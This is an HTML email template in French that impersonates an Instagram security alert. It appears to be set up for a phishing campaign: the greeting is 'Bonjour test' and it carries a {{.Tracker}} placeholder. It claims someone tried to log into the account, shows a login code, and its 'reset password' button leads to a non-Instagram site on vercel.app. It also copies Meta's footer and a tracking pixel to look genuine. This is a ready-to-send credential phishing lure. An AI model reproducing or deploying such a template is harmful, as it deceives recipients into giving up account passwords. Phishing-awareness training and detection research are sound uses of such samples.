<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" lang="fr">
 <head>
  <title>Instagram</title>
  <style type="text/css">
#outlook a {
	padding:0;
}
.es-button {
	mso-style-priority:100!important;
	text-decoration:none!important;
}
a[x-apple-data-detectors] {
	color:inherit!important;
	text-decoration:none!important;
	font-size:inherit!important;
	font-family:inherit!important;
	font-weight:inherit!important;
	line-height:inherit!important;
}
.es-desk-hidden {
	display:none;
	float:left;
	overflow:hidden;
	width:0;
	max-height:0;
	line-height:0;
	mso-hide:all;
}
@media only screen and (max-width:600px) {p, ul li, ol li, a { line-height:150%!important } h1, h2, h3, h1 a, h2 a, h3 a { line-height:120%!important } h1 { font-size:30px!important; text-align:left } h2 { font-size:24px!important; text-align:left } h3 { font-size:20px!important; text-align:left } .es-header-body h1 a, .es-content-body h1 a, .es-footer-body h1 a { font-size:30px!important; text-align:left } .es-header-body h2 a, .es-content-body h2 a, .es-footer-body h2 a { font-size:24px!important; text-align:left } .es-header-body h3 a, .es-content-body h3 a, .es-footer-body h3 a { font-size:20px!important; text-align:left } .es-menu td a { font-size:14px!important } .es-header-body p, .es-header-body ul li, .es-header-body ol li, .es-header-body a { font-size:14px!important } .es-content-body p, .es-content-body ul li, .es-content-body ol li, .es-content-body a { font-size:14px!important } .es-footer-body p, .es-footer-body ul li, .es-footer-body ol li, .es-footer-body a { font-size:14px!important } .es-infoblock p, .es-infoblock ul li, .es-infoblock ol li, .es-infoblock a { font-size:12px!important } *[class="gmail-fix"] { display:none!important } .es-m-txt-c, .es-m-txt-c h1, .es-m-txt-c h2, .es-m-txt-c h3 { text-align:center!important } .es-m-txt-r, .es-m-txt-r h1, .es-m-txt-r h2, .es-m-txt-r h3 { text-align:right!important } .es-m-txt-l, .es-m-txt-l h1, .es-m-txt-l h2, .es-m-txt-l h3 { text-align:left!important } .es-m-txt-r img, .es-m-txt-c img, .es-m-txt-l img { display:inline!important } .es-button-border { display:inline-block!important } a.es-button, button.es-button { font-size:18px!important; display:inline-block!important } .es-adaptive table, .es-left, .es-right { width:100%!important } .es-content table, .es-header table, .es-footer table, .es-content, .es-footer, .es-header { width:100%!important; max-width:600px!important } .es-adapt-td { display:block!important; width:100%!important } .adapt-img { width:100%!important; height:auto!important } .es-m-p0 { padding:0px!important } .es-m-p0r { padding-right:0px!important } .es-m-p0l { padding-left:0px!important } .es-m-p0t { padding-top:0px!important } .es-m-p0b { padding-bottom:0!important } .es-m-p20b { padding-bottom:20px!important } .es-mobile-hidden, .es-hidden { display:none!important } tr.es-desk-hidden, td.es-desk-hidden, table.es-desk-hidden { width:auto!important; overflow:visible!important; float:none!important; max-height:inherit!important; line-height:inherit!important } tr.es-desk-hidden { display:table-row!important } table.es-desk-hidden { display:table!important } td.es-desk-menu-hidden { display:table-cell!important } .es-menu td { width:1%!important } table.es-table-not-adapt, .esd-block-html table { width:auto!important } table.es-social { display:inline-block!important } table.es-social td { display:inline-block!important } .es-desk-hidden { display:table-row!important; width:auto!important; overflow:visible!important; max-height:inherit!important } }
@media screen and (max-width:384px) {.mail-message-content { width:414px!important } }
</style>
 </head>
 <body bgcolor="#ffffff" dir="ltr" style="width:100%;font-family:arial, 'helvetica neue', helvetica, sans-serif;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%;padding:0;Margin:0;margin:0">
  <table align="center" border="0" cellpadding="0" cellspacing="0" id="m_-7626415423304311386email_table" style="mso-table-lspace:0pt;mso-table-rspace:0pt;border-collapse:collapse;border-spacing:0px" role="none">
    <tr>
     <td id="m_-7626415423304311386email_content" style="padding:0;Margin:0;font-family:'Helvetica Neue', Helvetica, 'Lucida Grande', tahoma, verdana, arial, sans-serif;background:#ffffff">
      <table border="0" cellpadding="0" cellspacing="0" style="mso-table-lspace:0pt;mso-table-rspace:0pt;border-collapse:collapse;border-spacing:0px" width="100%" class=" cke_show_border" role="none">
        <tr>
         <td colspan="3" height="20" style="padding:0;Margin:0;line-height:20px"><br></td>
        </tr>
        <tr>
         <td colspan="3" height="1" style="padding:0;Margin:0;line-height:1px"><br></td>
        </tr>
        <tr>
         <td style="padding:0;Margin:0">
          <table border="0" cellpadding="0" cellspacing="0" style="mso-table-lspace:0pt;mso-table-rspace:0pt;border-collapse:collapse;border-spacing:0px;text-align:center;width:100%" width="100%" class=" cke_show_border" role="none">
            <tr>
             <td style="padding:0;Margin:0;width:15px" width="15px"><br></td>
             <td style="padding:0 0 15px 0;Margin:0;line-height:0px;max-width:600px">
              <table border="0" cellpadding="0" cellspacing="0" style="mso-table-lspace:0pt;mso-table-rspace:0pt;border-collapse:collapse;border-spacing:0px" width="100%" class=" cke_show_border" role="none">
                <tr>
                 <td style="padding:0;Margin:0;width:100%;text-align:left;height:33px"><img class="CToWUd" data-bit="iit" src="https://www.meilleure-innovation.com/wp-content/uploads/2022/04/logo-instagram-1200x676.png" style="display:block;border:0px;outline:none;text-decoration:none;-ms-interpolation-mode:bicubic;height:100px;width:200px" alt></td>
                </tr>
              </table></td>
             <td style="padding:0;Margin:0;width:15px" width="15px"><br></td>
            </tr>
          </table></td>
        </tr>
        <tr>
         <td style="padding:0;Margin:0">
          <table border="0" cellpadding="0" cellspacing="0" style="mso-table-lspace:0pt;mso-table-rspace:0pt;border-collapse:collapse;border-spacing:0px;margin:0 auto 0 auto;width:430px" class=" cke_show_border" role="none">
            <tr>
             <td style="padding:0;Margin:0">
              <table border="0" cellpadding="0" cellspacing="0" style="mso-table-lspace:0pt;mso-table-rspace:0pt;border-collapse:collapse;border-spacing:0px;margin:0 auto 0 auto;width:430px" width="430px" class=" cke_show_border" role="none">
                <tr></tr>
                <tr>
                 <td style="padding:0;Margin:0">
                  <table border="0" cellpadding="0" cellspacing="0" style="mso-table-lspace:0pt;mso-table-rspace:0pt;border-collapse:collapse;border-spacing:0px" width="100%" class=" cke_show_border" role="none">
                    <tr>
                     <td style="padding:0;Margin:0">
                      <table border="0" cellpadding="0" cellspacing="0" style="mso-table-lspace:0pt;mso-table-rspace:0pt;border-collapse:collapse;border-spacing:0px" class=" cke_show_border" role="none">
                        <tr>
                         <td style="padding:0;Margin:0">
                          <table border="0" cellpadding="0" cellspacing="0" style="mso-table-lspace:0pt;mso-table-rspace:0pt;border-collapse:collapse;border-spacing:0px" class=" cke_show_border" role="none">
                            <tr>
                             <td align="left" style="padding:0;Margin:0"><p style="Margin:0;-webkit-text-size-adjust:none;-ms-text-size-adjust:none;mso-line-height-rule:exactly;font-family:arial, 'helvetica neue', helvetica, sans-serif;line-height:27px;margin:10px 0 10px 0;color:#565a5c;font-size:18px">Bonjour test,</p><p style="Margin:0;-webkit-text-size-adjust:none;-ms-text-size-adjust:none;mso-line-height-rule:exactly;font-family:arial, 'helvetica neue', helvetica, sans-serif;line-height:27px;margin:10px 0 10px 0;color:#565a5c;font-size:18px">Quelqu'un a essayé de se connecter à votre compte Instagram.</p><p style="Margin:0;-webkit-text-size-adjust:none;-ms-text-size-adjust:none;mso-line-height-rule:exactly;font-family:arial, 'helvetica neue', helvetica, sans-serif;line-height:27px;margin:10px 0 10px 0;color:#565a5c;font-size:18px">Si c'était bien vous , veuillez utiliser s'il vous plaît le code ci-dessous pour vous connecter :</p><p style="Margin:0;-webkit-text-size-adjust:none;-ms-text-size-adjust:none;mso-line-height-rule:exactly;font-family:arial, 'helvetica neue', helvetica, sans-serif;line-height:27px;margin:10px 0 10px 0;color:#565a5c;font-size:18px"><strong>823013</strong></p><p style="Margin:0;-webkit-text-size-adjust:none;-ms-text-size-adjust:none;mso-line-height-rule:exactly;font-family:arial, 'helvetica neue', helvetica, sans-serif;line-height:27px;margin:10px 0 10px 0;color:#565a5c;font-size:18px">Si ce n'était pas vous , veuillez réinitialiser votre mot de passe pour sécuriser votre compte</p></td>
                            </tr>
                            <tr>
                             <td height="20" style="padding:0;Margin:0;line-height:20px"><br></td>
                            </tr>
                            <tr>
                             <td style="padding:0;Margin:0">
                              <table border="0" cellpadding="0" cellspacing="0" style="mso-table-lspace:0pt;mso-table-rspace:0pt;border-collapse:collapse;border-spacing:0px;width:390px" class=" cke_show_border" role="none">
                              <tr>
                              <td style="padding:10px 16px 14px 16px;Margin:0;border-collapse:collapse;border-radius:3px;text-align:center;display:block;border:solid 1px #009fdf;margin:0 2px 0 auto;min-width:80px;background-color:#47a2ea">
                              <center><font color="#fdfdfd" face="Helvetica Neue, Helvetica, Roboto, Arial, sans-serif" style="text-wrap:nowrap"><b><a target="_blank" href="https://reinitialisation.vercel.app/" style="-webkit-text-size-adjust:none;-ms-text-size-adjust:none;mso-line-height-rule:exactly;text-decoration:underline">Réinitialiser votre mot de passe</a></b></font>
                              </center></td>
                              </tr>
                              </table></td>
                            </tr>
                            <tr>
                             <td height="20" style="padding:0;Margin:0;line-height:20px"><br></td>
                            </tr>
                          </table></td>
                        </tr>
                      </table></td>
                    </tr>
                  </table></td>
                </tr>
                <tr>
                 <td colspan="1" height="10" style="padding:0;Margin:0;line-height:10px"><br></td>
                </tr>
              </table></td>
            </tr>
          </table></td>
        </tr>
        <tr>
         <td style="padding:0;Margin:0">
          <table border="0" cellpadding="0" cellspacing="0" style="mso-table-lspace:0pt;mso-table-rspace:0pt;border-collapse:collapse;border-spacing:0px;margin:0 auto 0 auto;width:100%;max-width:600px" class=" cke_show_border" role="none">
            <tr>
             <td colspan="3" height="4" style="padding:0;Margin:0;line-height:4px"><br></td>
            </tr>
            <tr>
             <td style="padding:0;Margin:0;width:15px" width="15px"><br></td>
             <td style="padding:0;Margin:0;display:block;width:20px" width="20"><br></td>
             <td style="padding:0;Margin:0;text-align:center">
              <div style="padding-top:10px;display:flex">
               <div style="margin:auto"><br>
               </div>
              </div>
              <div style="height:10px"><br>
              </div>
              <div style="color:#abadae;font-size:11px;margin:0 auto 5px auto">
               © Instagram. Meta Platforms, Inc., 1601 Willow Road, Menlo Park, CA 94025
              </div>
              <div style="color:#abadae;font-size:11px;margin:0 auto 5px auto">
               If you didn't change your Instagram <span class="il">email</span> address, <a data-saferedirecturl="https://www.google.com/url?q=https://instagram.com/accounts/remove/revoke_wrong_email/?uidb36%3Dn752wk1%26token%3D5zw-22ded54809dcbad9c7a4d6282b8ed7fb%26nonce%3DBoDUVCNb%26encoded_email%3DcnVhc2luZ2hlMDFAZ21haWwuY29t&amp;source=gmail&amp;ust=1658914278556000&amp;usg=AOvVaw3Oe3Hp81PQfDyukdRF_9vN" href="" style="-webkit-text-size-adjust:none;-ms-text-size-adjust:none;mso-line-height-rule:exactly;text-decoration:underline;color:#abadae" target="_blank">revert this change</a>.
              </div></td>
             <td style="padding:0;Margin:0;display:block;width:20px" width="20"><br></td>
             <td style="padding:0;Margin:0;width:15px" width="15px"><br></td>
            </tr>
            <tr>
             <td colspan="3" height="32" style="padding:0;Margin:0;line-height:32px"><br></td>
            </tr>
          </table></td>
        </tr>
      </table><span><img class="CToWUd" data-bit="iit" src="https://ci3.googleusercontent.com/proxy/XYDA1Q9a8bEbw5evSiEx3V7C_a6ydq1Ys9pPtIa5MqgXIaVZzIJ_pAsqGN9NxLL5McHbWMD5OgW5L5yjhaDXk0LejCfvjhFKyM7OyA177wAXr5JPX55sziazYpGm_8-gBpSeNqRjQh7UCUg9ZpFmOg1m0Bby=s0-d-e1-ft#https://www.facebook.com/email_open_log_pic.php?mid=5dc870c3f3046G24bc389ce16251G5dc8755d53319G278" style="display:block;border:0;outline:none;text-decoration:none;-ms-interpolation-mode:bicubic;width:1px;height:1px" alt></span></td>
    </tr>
  </table>
  <p style="Margin:0;-webkit-text-size-adjust:none;-ms-text-size-adjust:none;mso-line-height-rule:exactly;font-family:arial, 'helvetica neue', helvetica, sans-serif;line-height:150%">{{.Tracker}}</p>
  <div id="gtx-trans" style="position:absolute;left:139px;top:365.2px">
   <div class="gtx-trans-icon">
    &nbsp;
   </div>
  </div>
 </body>
</html>